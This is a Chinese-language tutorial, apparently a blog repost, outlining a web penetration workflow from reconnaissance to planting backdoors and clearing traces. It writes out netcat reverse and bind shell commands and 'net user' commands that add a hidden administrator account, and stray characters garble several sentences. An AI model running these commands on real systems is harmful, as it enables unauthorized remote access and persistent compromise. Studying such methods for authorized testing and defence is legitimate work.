
Web渗透分为以下几个斗兄步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看姿山是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器 *** 作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞迹销中
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
完成dns、搜索引擎google、ssl、备案号、暴力破解、app反编译、微信公众号、jsfinder获取二级域名信息
whois: 标准的互联网协议,经常用来收集目标域名相关信息,网络注册信息,注册域名、ip地址等信息
可根据以下方法进行子域名探测:
[1]. dns域传送漏洞
在kali下 使用 dnsenum 参数 域名 命令,来收集一个域的信息。
主要参数:
-h 查看工具使用帮助
-dnsserver <server>指定域名服务器
-enum 快捷键 相当于"--threads 5 -s 15 -w" (启动5线程,谷歌搜索15条子域名)
-f dns.txt 指定字典文件
-w (--whois) 在一个c段网络地址范围 提供whois查询
--noreverse 跳过反向查询 *** 作
[2] 备案号查询
网站备案查询地址: https://icp.chinaz.com/
http://icp.bugscaner.com/
根据域名在相关网站上找到备案号信息,在根据备案号信息查找到相关域名信息。
[3] ssl证书查询
通过查询SSL证书,获取的域名存活率很高。
查询网址: https://myssl.com/ssl.html 和 https://www.chinassl.net/ssltools/ssl-checker.html
[4]google 搜索c段
旁站:旁站是和目标贺耐网站在同一台服务器上的其它的网站。
C段:C段是和目标服务器ip处在同一个C段的其它服务乱拍正器。
使用网站webscan.cc查询旁站c段。
1.参考googleHack 用法 :
2.用DotNetScan工具
工具地址:VStart50\VStart50\tools\漏洞利用\IISPutScanner增强版
[5] app提取
反编译APP可进行提取相关IP地址等 *** 作。
[6] 微信公众号
[7] JsFinder 查找子域名
将JsFinder.py复制到kali系统文件夹下,进入该文件夹使用命令 进行查询。
-d:表示深度爬取
[8] 字典枚举
字典枚举法是一种传统查找子域名的技术,这类工具有 DNSReconcile、Layer子域名挖掘机、DirBuster等。
FOFA是网络空间安全搜索引擎,收录的是设备而不是网页。能够探索全球互联网资产信息。
网站是fofa.so
搜索语法为:
ip=“1.1.1.1”哗悔 搜索与此ip相关的网站
port="8009" 查找开发了8009端口的服务器
domain="qq.com" 搜索跟域名带有qq.com的网站
PS:指纹识别:其核心原理是通过正则表达式匹配特征码或匹配文件的md5值等特殊信息,进而识别web应用程序的名称和版本,收集信息。
常见指纹检测的对象
1、CMS信息:比如大汉CMS、织梦、帝国CMS、phpcms、ecshop等;
2、前端技术:比如HTML5、jquery、bootstrap、pure、ace等;
3、Web服务器:比如Apache、lighttpd, Nginx, IIS等;
4、应用服务器:比如Tomcat、Jboss、weblogic、websphere等;
5、开发语言:比如PHP、Java、Ruby、Python、C#等;
6、 *** 作系统信息:比如linux、win2k8、win7、kali、centos等;
7、CDN信息:是否使用CDN,如cloudflare、360cdn、365cyd、yunjiasu等;
8、WAF信息:是否使用waf,如Topsec、Jiasule、Yundun等;
9、IP及域名信息:IP和域名注册信息、服务商信息等;
10、端口信息:有些软件或平台还会探测服务器开放的常见端口。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)